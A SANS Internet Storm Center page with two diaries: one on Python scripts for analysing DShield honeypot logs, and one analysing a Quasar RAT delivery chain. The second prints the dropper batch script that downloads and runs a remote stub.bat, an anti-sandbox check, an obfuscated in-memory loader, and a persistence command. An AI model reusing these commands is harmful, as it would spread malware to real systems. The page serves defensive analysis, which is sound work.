Automated Tools to Assist with DShield Honeypot Investigations [Guest Diary]

Published: 2025-06-11. Last Updated: 2025-06-12 11:50:56 UTC
by Guy Bruneau (Version: 1)

[This is a Guest Diary by William Constantino, an ISC intern as part of the SANS.edu BACS program]

In the beginning of my Internet Storm Center (ISC) internship, I wasted too much time trying to build my SIEM from an old computer I had lying around, or a new Raspberry Pi I purchased. I kept running into roadblocks and errors. Also, I was distracted while trying to finish up another course, and I had every intention of looking at my log files every day, but it wasn't happening. I did the easy thing of saying "I'll look at it tomorrow." The JSON logs and SQLite3 were the other problems with reading the logs without a SIEM: they produced massive amounts of data to parse through. To me it was like trying to find a needle in a haystack. To resolve this problem, I built two automated Python tools to assist with those tasks and analyze the data.

The first tool helped me process and organize the data I was looking at and pointed me toward interesting things to investigate further. It gave me the following capabilities:

  1. Loads, reads, and parses the JSON log files, extracting source IP addresses, request methods, accessed URLs, timestamps, user agents, response codes, credentials, and hashes.
  2. Tracks IP activity by recording the request methods used (GET, POST, etc.) and storing the timestamps of requests for timeline analysis.
  3. Counts URL accesses to identify the most frequently requested endpoints, logs the user-agent strings to detect patterns in client access, and captures the response codes to track server errors or unusual behavior.
  4. Detects suspicious activity by flagging requests for suspicious file types (.php, .exe, .zip, etc.), extracting credential attempts (checked against the 20 most used usernames and passwords), and identifying hash-like values (MD5, SHA1, CRC32, NTLM, etc.).
  5. Generates a generic security report: the top 10 most active IPs, the bottom 10 least active IPs, and the total number of unique IPs, with a summary of total requests, detected hashes, and credential attempts.
  6. Lastly, it measures how long the script takes to process the log file and displays the result in minutes and seconds (I added this last because I wanted to know how long reading and parsing the data was taking).

The sample output from this tool is from 2025-05-31, a massive log file of over 3.5 GB for a single day (the reason I added the timer). I will break down the output of Tool 1 in sections below:

Figure 1: Top 10 most Active IP addresses, Bottom 10 Least Active IPs, and General Summary.

Continued Output Tool 1:


Figure 2: The Request Methods Used and Top Accessed URLs.

Continued Output Tool 1: 


Figure 3: Suspicious File Requests and Top User-Agent Strings.

Continued Output Tool 1: 


Figure 4: Top attempted usernames and attempted passwords.

Continued Output Tool 1:
 

Figure 5: Hashes Detected and the Time it took to read the log file.

Once I had this output to look at, I determined which IP address was the most interesting. I usually start with the one with the largest number of requests to see what is going on. I will look at all 10-20 (the top and bottom 10) individually, see what they were doing, and then determine which IP address to highlight for my analysis. Sometimes, if I'm looking at the same exploit, I'll research all the other IPs to see if there is a novel attack or a different type of attack. To assist with further investigation, I developed a second tool. It is basically the same as the first tool, but it focuses on detailed analysis of specific IP(s).

The second Python tool performs a detailed analysis on one or more IP addresses of interest from a given JSON log file. This tool does the following:

  1. Prompts for one (1) or multiple IP addresses.
  2. Extracts the "sip" (source IP) field from each log entry and identifies the requests made by the target IP(s).
  3. Gathers the HTTP request methods used by the target IP (GET, POST, HEAD, etc.) and records the timestamps, giving the timeframe of the requests.
  4. Analyzes the user-agent strings, which can indicate whether the requests originated from a legitimate browser, an automated bot, or a hacking tool (keeping in mind that the string is supplied by the client and is easily spoofed).
  5. Examines response codes to show whether the target IP successfully accessed certain resources.
  6. Detects suspicious file requests (.php, .exe, .zip, .bat, .sh, .py).
  7. Detects credential attempts using default usernames and passwords (currently only the top twenty of each).
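To make the two capability lists above concrete, here is an added example that is not the author's code (the real scripts are linked at [2] and [3]). It streams a web honeypot log one JSON object per line, builds the Tool 1 style overview (top and bottom IPs, methods, URLs, user agents, response codes, suspicious file requests, credentials, hash-like values) and then the Tool 2 style drill-down for a chosen set of source IPs. Only the "sip" field name comes from the diary; the other field names (time, method, url, useragent, response, data) and the sample log lines are constructed assumptions.

```python
import json
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample, one JSON object per line. Only "sip" is named in the diary;
# the remaining field names are assumptions. The non-JSON line stands in for the
# partial writes a multi-GB log can contain.
SAMPLE_LOG = """\
{"time": "2025-05-31T00:00:01", "sip": "203.0.113.7", "method": "GET", "url": "/", "useragent": "Mozilla/5.0", "response": 200}
{"time": "2025-05-31T00:00:05", "sip": "203.0.113.7", "method": "GET", "url": "/backup.zip", "useragent": "curl/8.0", "response": 404}
{"time": "2025-05-31T00:00:09", "sip": "203.0.113.7", "method": "POST", "url": "/management/login.php", "useragent": "python-requests/2.31", "response": 200, "data": "username=admin&password=admin123"}
{"time": "2025-05-31T00:01:00", "sip": "198.51.100.9", "method": "GET", "url": "/wp-login.php", "useragent": "Mozilla/5.0", "response": 404}
{"time": "2025-05-31T00:01:30", "sip": "198.51.100.9", "method": "GET", "url": "/shell.exe", "useragent": "Mozilla/5.0", "response": 404}
this line is not JSON and must not abort a 3.5 GB run
{"time": "2025-05-31T00:02:00", "sip": "192.0.2.3", "method": "HEAD", "url": "/", "useragent": "Mozilla/5.0 (compatible; scanner)", "response": 200}
"""

SUSPICIOUS_EXT = ('.php', '.exe', '.zip', '.bat', '.sh', '.py')
USER_KEYS = ('username', 'user', 'login')
PASS_KEYS = ('password', 'pass', 'passwd')
# Hex runs by length: 32 = MD5 or NTLM (not distinguishable by length), 40 = SHA1,
# 64 = SHA256. CRC32 (8 hex) is left out on purpose: it matches far too much data.
HASH_RE = re.compile(r'(?<![0-9a-fA-F])[0-9a-fA-F]{32}(?:[0-9a-fA-F]{8}|[0-9a-fA-F]{32})?(?![0-9a-fA-F])')


def iter_records(lines):
    """Stream the log line by line (json.load of the whole file would need all
    3.5 GB in memory); skip blank and malformed lines instead of aborting."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def is_suspicious(url):
    # Look at the path only, so "/download?file=a.exe" is not flagged by its query.
    return urlsplit(url).path.lower().endswith(SUSPICIOUS_EXT)


def credentials(rec):
    """Username/password pairs from a form-encoded POST body or query string."""
    pairs = []
    for blob in (rec.get('data') or '', urlsplit(rec.get('url', '')).query):
        qs = parse_qs(blob)
        user = next((qs[k][0] for k in USER_KEYS if k in qs), None)
        pw = next((qs[k][0] for k in PASS_KEYS if k in qs), None)
        if user is not None or pw is not None:
            pairs.append((user, pw))
    return pairs


def summarize(records, top=10):
    """Tool 1 style overview of a whole day's log."""
    keys = ('ips', 'methods', 'urls', 'useragents', 'responses', 'suspicious', 'usernames', 'passwords', 'hashes')
    c = {k: Counter() for k in keys}
    total = 0
    for r in records:
        total += 1
        url = r.get('url', '')
        c['ips'][r.get('sip')] += 1
        c['methods'][r.get('method')] += 1
        c['urls'][url] += 1
        c['useragents'][r.get('useragent')] += 1
        c['responses'][r.get('response')] += 1
        if is_suspicious(url):
            c['suspicious'][url] += 1
        for user, pw in credentials(r):
            if user is not None:
                c['usernames'][user] += 1
            if pw is not None:
                c['passwords'][pw] += 1
        for h in HASH_RE.findall(url + ' ' + (r.get('data') or '')):
            c['hashes'][h.lower()] += 1
    ranked = c['ips'].most_common()
    report = {'total_requests': total, 'unique_ips': len(c['ips']),
              'top_ips': ranked[:top], 'bottom_ips': ranked[::-1][:top]}
    report.update((k, v.most_common(top)) for k, v in c.items() if k != 'ips')
    return report


def profile_ips(records, targets):
    """Tool 2 style drill-down: what each chosen source IP did, with first/last
    seen (ISO 8601 timestamps sort correctly as plain strings)."""
    targets = {t.strip() for t in targets}
    prof = {t: {'requests': 0, 'first': None, 'last': None, 'methods': Counter(), 'urls': Counter(),
                'useragents': Counter(), 'responses': Counter(), 'suspicious': [], 'credentials': []}
            for t in targets}
    for r in records:
        ip = r.get('sip')
        if ip not in targets:
            continue
        p, url, ts = prof[ip], r.get('url', ''), r.get('time')
        p['requests'] += 1
        if ts is not None:
            p['first'] = ts if p['first'] is None else min(p['first'], ts)
            p['last'] = ts if p['last'] is None else max(p['last'], ts)
        p['methods'][r.get('method')] += 1
        p['urls'][url] += 1
        p['useragents'][r.get('useragent')] += 1
        p['responses'][r.get('response')] += 1
        if is_suspicious(url):
            p['suspicious'].append(url)
        p['credentials'].extend(credentials(r))
    return prof


if __name__ == '__main__':
    lines = SAMPLE_LOG.splitlines()
    print(json.dumps(summarize(iter_records(lines)), indent=1, default=str))
    print(json.dumps(profile_ips(iter_records(lines), ['203.0.113.7']), indent=1, default=str))
```

On a real file, pass an open file object to iter_records() instead of SAMPLE_LOG.splitlines(); because the records are streamed, the generator has to be recreated for each pass (one for summarize(), one for profile_ips()). The credential extraction only understands form-encoded bodies, so JSON login bodies would need a second parser.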

Below is my output for the second tool (also for 2025-05-31). It is basically the same as the first tool, but it focuses on detailed analysis of specific IPs.

Output Tool 2:


Figure 6: Prompt to enter one (1) IP or multiple IP addresses separated by a comma.

Continued output Tool 2:


Figure 7: I entered the IP address 141.98.80.134. In this case, it was the #1 active IP.

Continued output of Tool 2:


Figure 8: Analysis for IP (141.98.80.134) with a massive number of requests.
 
The top accessed URLs in this investigation of this IP are ones known to be used against CVE-2021-20016, a SonicWall SMA 100 series vulnerability [1]. I've actually seen this type of attack lately.


Figure 9: Internet Storm Center report on a SonicWall exploit [1].

Continued output of Tool 2:


Figure 10: User-Agent Strings and Attempted Passwords. 

This script reports when it finds no data for one of the fields it looks at. The first tool does not, but usually there are all types of data and no field is empty during an investigation.

Continued output of Tool 2:


Figure 11: The Log Analysis is Complete. 

It took almost 13 minutes to complete. This was a massive file compared to other days, so analysis will be much faster with less data.
Having used the tool to analyze the data in a short amount of time, the analyst can then query more information about the IP from services like VirusTotal, IPQualityScore, APIVoid, etc. That information might give additional data points to decide whether further investigation is warranted.

In conclusion, my Python scripts can help detect potential attackers targeting a DShield honeypot. The tools can assist in forensic analysis by tracking IP behavior, login attempts, suspicious files, and other data. Additionally, they can provide insights into common attack patterns and methods used by malicious actors. Other students or individuals can benefit from using these tools for their analysis and attack observations. This is only a starting point for these tools; massive improvements can be made to make them even more effective and useful. In the short term, though, these tools significantly assisted my analysis projects during this internship. The links to my GitHub for both tools are below [2][3].

[1] https://isc.sans.edu/diary/31906
[2] https://github.com/JJWCons/log-scripts/blob/main/logfile_investigation.py (Tool 1 Code)
[3] https://github.com/JJWCons/log-scripts/blob/main/single_multi_IP.py (Tool 2 Code)
[4] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Quasar RAT Delivered Through Bat Files

Published: 2025-06-11. Last Updated: 2025-06-11 05:53:08 UTC
by Xavier Mertens (Version: 1)

RATs are popular malware. There are many of them in the wild, Quasar [1] being one of them. The malware has been active for a long time and new campaigns regularly come back on stage. I spotted an interesting .bat file (Windows script) that attracted my attention because it is very well obfuscated. This file is a second stage that is downloaded and launched by a simple script:

@echo off
set "DOCX_PATH=%dp0Game_Purchase_Agreement (1).docx"
set "BAT_URL=hxxps://store3[.]gofile[.]io/download/web/60e1cbe3-5bcb-4ce5-9807-096b7ef2152c/stub.bat"
set "STUB_BAT=%dp0stub.bat"
start "" "%DOCX_PATH%"
powershell -noprofile -windowstyle hidden -command "Invoke-WebRequest -Uri '%BAT_URL%' -OutFile '%STUB_BAT%'"
start "" /B "%STUB_BAT%"

A decoy Office document is opened to reassure the victim. Let's have a look at the stub[.]bat file, the obfuscated one. The file has a "nice" VT score (1/61) (SHA256: 06463c161db81b0714be03cd33431730a5fa56e0019901b03ec61943e08f8e9f [2]).

Many environment variables are used, and "goto" statements jump forward and backward in the file to reconstruct the code. Variables such as %ywbR5EU0% are never defined, so they expand to nothing and only serve to split keywords like "goto" and "set" so that they do not appear verbatim:

%ywbR5EU0%got%psT9UHn%o%ck4mP% :cFjGe

:: merit cause glow side across trick humble man aunt man
:KVwlg
%wn70F%s%xrXwJ%et%zLQjCV% "BFT0e7D9=;$OM1Hj" && %NV38nVKJ%set%tlIujlLR% "wGIv=ey = "&&%mAyrqy%set "wxzXFAyU=Fu.GetT"
%MqHr7m%s%dOBZ%e%ARwzE%t%SN8O3x1% "BjosEB=.Tripl"
s%CVz5%e%PLqV%t "Ie9m=ray();$"
%y5ysfL1C%se%UnikunR6%t%k44zaPJk% "C209=ilter P" &&%psM62h7K%s%lTgUuB%e%oGydvBuB%t%hOBl% "sRJXLMHX=r');$"&& %KNhC9wR%se%DID28qi%t%AgqDi% "DYcN9B=e[]]@(" && s%ENstJM%e%IRLW%t%A6NRgyd% "k3mI=s8 $OM1" &&%mG1f%se%DWxnLG%t%Oaiu% "YZrsX=rovide" && set "NmTYyNq2=Invo"
g%yQH7u6H%oto :bPY4

:: reject purity renew better trick
:iaryMFz
s%dEnHV9%e%KlnkeRpX%t%CTZS% "INBx=
[rest of the obfuscated script omitted]

The script rebuilds code to launch two PowerShell instances. The first one is a simple anti-sandbox check:

powershell.exe -ep bypass -w hidden -command $bKOPdCKMepGCO5Y9Yf=(Get-Disk).FriendlyName;if ($bKOPdCKMepGCO5Y9Yf -like '*DADY'+' HARD'+'DIS'+'K*' -or $bKOPdCKMepGCO5Y9Yf -like '*QEMU '+'HARDDI'+'SK*') {taskkill /f /im cmd.exe}

It's the first time I see this pretty efficient technique. It reads the friendly name of the disks with Get-Disk and, if one matches "DADY HARDDISK" or "QEMU HARDDISK" (the strings are split into pieces so that the labels never appear verbatim), it kills cmd.exe, which terminates the batch script. That was the case in my sandbox, so I had to patch the script :-)

PS C:\Users\REM>(Get-Disk).FriendlyName
QEMU HARDDISK

The second PowerShell instance is the core infection path. It downloads a PNG image that contains the payload to inject into a process. The image is fetched from: hxxps://i[.]ibb[.]co/NdvrqCDQ/j1bz[.]png.

The PowerShell code is also obfuscated and relies on environment variables defined in the original .bat file!

powershell.exe -ep bypass -w hidden -command $cVql = [System.Convert]::FromBase64String(($env:vFSz6.Split('.')|ForEach-Object{(Get-Item ('Env:'+$_)).Value})-join'');$yqt3Czji = [Type]::GetType('System.Security.Cryptography.TripleDESCryptoServiceProvider')::new();$yqt3Czji.Key = [byte[]]@(30,81,30,197,159,52,214,36,169,151,167,116,102,113,244,65);$yqt3Czji.Mode = 'ECB';$yqt3Czji.Padding = 'PKCS7';$yRCM = $yqt3Czji.CreateDecryptor().TransformFinalBlock($cVql,0,$cVql.Length);$XfQ7 = New-Object ('System'+'.IO'+'.Me'+'morySt'+'ream') -ArgumentList (,$yRCM);$nlt6O = New-Object ('Syste'+'m.IO'+'.Me'+'morySt'+'rea'+'m');$tej8sBLE = New-Object ('Syst'+'em.IO.'+'Compre'+'ssio'+'n.G'+'ZipSt'+'rea'+'m') -ArgumentList ($XfQ7, [IO.Compression.CompressionMode]('Decompress'));$tej8sBLE.CopyTo($nlt6O);$UWoQx = $nlt6O.ToArray();$uGjPve = New-Object ('Sys'+'tem'+'.Secu'+'rity'+'.Cry'+'ptogra'+'phy.'+'SHA256'+'Crypt'+'oSer'+'viceP'+'rovid'+'er');$s86s8 = $uGjPve.ComputeHash($UWoQx);$OM1Hjgf = [byte[]]@(26,203,98,66,123,85,187,210,99,96,236,147,173,234,222,190,107,34,223,203,242,234,205,211,250,22,173,56,84,163,184,31);if (-Not (Compare-Object $s86s8 $OM1Hjgf)) {$dfGJB = (Get-CimInstance ('Win32_'+'Pro'+'cess') -Filter ProcessId=$pid).CommandLine;foreach ($EsLaimFu in [AppDomain]::CurrentDomain.GetAssemblies()){if ($EsLaimFu.GlobalAssemblyCache -And $EsLaimFu.Location.Contains('mscorl'+'ib.dll')){foreach ($pMdg2Ay in $EsLaimFu.GetType('Syste'+'m.Refl'+'ect'+'ion.As'+'sembly').GetMethods('Pub'+'lic,St'+'atic')){if ($pMdg2Ay.ToString()[38] -eq ')') {$pMdg2Ay.Invoke($null, (,$UWoQx)).EntryPoint.Invoke($null, (,[string[]](,$dfGJB)))}}}}}

Reading through it: $env:vFSz6 holds a dot-separated list of environment variable names; their values are concatenated and Base64-decoded, decrypted with TripleDES (16-byte key, ECB mode, PKCS7 padding), gunzipped, and checked against a hard-coded SHA-256 digest. Only if the digest matches does the script walk the public static methods of System.Reflection.Assembly in mscorlib and pick one by the shape of its signature string (a ')' at index 38, which fits the 39-character "System.Reflection.Assembly Load(Byte[])"), so the name of the method never appears in the script. The decrypted .NET assembly is loaded in memory and its entry point is invoked with the current PowerShell command line as argument. You can still read interesting strings like "GetAssemblies", "System.Reflection.Assembly" or "Invoke", which give away the reflective loading used to perform the code injection.
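As an added example (not code from the diary and not the real stub), the following small cmd.exe emulator reproduces the two reconstruction tricks described above: it follows the goto control flow, applies each "set" with batch-style %VAR% expansion (undefined variables expand to nothing), and collects the commands that would actually run; it then mirrors the $env:X.Split('.') reassembly the PowerShell stage uses to rebuild the Base64 blob from many small variables. The sample script, its labels and variable names are constructed in the same style as stub[.]bat; delayed expansion (!VAR!), "call" and %~dp0 are not implemented.

```python
import base64
import re

# Constructed sample in the style of the stub (not the real file): junk variables
# that expand to nothing hide the keywords, "::" lines are noise, and goto shuffles
# the execution order of the labelled blocks.
SAMPLE_BAT = r"""@echo off
%Qx1%got%Zz%o :start

:: merit cause glow side across trick
:part2
set "P1=wershell -ep by"&&%n1%s%n2%et "P2=pass -w hidden"
%a%s%b%e%c%t "CHUNK=c1.c2.c3"
goto :part3

:start
s%j%e%k%t "P0=po"
set "c1=SGVs"&&set "c2=bG8s"&&set "c3=IHdvcmxk"
%Qx1%goto :part2

:part3
%P0%%P1%%P2% -command "$env:CHUNK"
"""

VAR_RE = re.compile(r'%([^%\s]*)%')
SET_RE = re.compile(r'^set\s+"?([^="]+)=(.*?)"?\s*$', re.IGNORECASE)
GOTO_RE = re.compile(r'^goto\s+:?(\S+)', re.IGNORECASE)


def expand(line, env):
    """Batch-style %VAR% expansion: unknown variables expand to nothing (what the
    junk variables rely on); %% is a literal percent sign. Names are case-insensitive."""
    return VAR_RE.sub(lambda m: '%' if m.group(1) == '' else env.get(m.group(1).lower(), ''), line)


def split_commands(line):
    """Split on && outside double quotes, so a quoted value may contain &&."""
    parts, buf, in_quotes, i = [], [], False, 0
    while i < len(line):
        if line[i] == '"':
            in_quotes = not in_quotes
        if not in_quotes and line.startswith('&&', i):
            parts.append(''.join(buf))
            buf, i = [], i + 2
            continue
        buf.append(line[i])
        i += 1
    parts.append(''.join(buf))
    return [p.strip() for p in parts if p.strip()]


def emulate(script, max_steps=100000):
    """Follow the goto control flow from the top, apply every set, and return the
    resulting environment plus every other command as cmd.exe would run it."""
    lines = script.splitlines()
    labels = {}
    for i, raw in enumerate(lines):
        s = raw.strip()
        if s.startswith(':') and not s.startswith('::') and s[1:].split():
            labels[s[1:].split()[0].lower()] = i
    env, commands, pc, steps = {}, [], 0, 0
    while pc < len(lines):
        steps += 1
        if steps > max_steps:
            raise RuntimeError('step limit reached: goto loop?')
        line = expand(lines[pc], env).strip()   # expansion happens before parsing, per line
        pc += 1
        if not line or line.startswith(':') or line.lower().startswith(('rem ', '@echo off')):
            continue
        for cmd in split_commands(line):
            m = GOTO_RE.match(cmd)
            if m:
                target = m.group(1).lower()
                if target == 'eof':
                    return env, commands
                pc = labels[target] + 1    # KeyError on an unknown label, like cmd's abort
                break
            m = SET_RE.match(cmd)
            if m:
                env[m.group(1).strip().lower()] = m.group(2)
            else:
                commands.append(cmd)
    return env, commands


def reassemble(env, index_var):
    """Mirror of $env:X.Split('.') | ForEach-Object { (Get-Item ('Env:'+$_)).Value } -join '':
    the index variable lists the names of the chunk variables, in order."""
    return ''.join(env[name.lower()] for name in env[index_var.lower()].split('.'))


def decode_payload(env, index_var):
    """The Base64 layer; in the real sample TripleDES and gzip would follow."""
    return base64.b64decode(reassemble(env, index_var))


if __name__ == '__main__':
    env, cmds = emulate(SAMPLE_BAT)
    for c in cmds:
        print(c)
    print(decode_payload(env, 'CHUNK'))
```

To use it on a real stub, pass the file's text to emulate() and look at the returned commands for the reconstructed PowerShell lines; the environment dictionary then holds the chunks the PowerShell stage reads back with Get-Item Env:, which is what reassemble() rebuilds.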

Persistence is implemented through a scheduled task:

schtasks /create /xml 4TCqY.xml /tn f4a22537-7897-4a26-90de-51508f11b41d

The C2 server is JamieRose-42682[.]portmap[.]io.

[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
[2] https://www.virustotal.com/gui/file/06463c161db81b0714be03cd33431730a5fa56e0019901b03ec61943e08f8e9f/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

ISC Stormcast For Wednesday, June 11th, 2025 https://isc.sans.edu/podcastdetail/9488
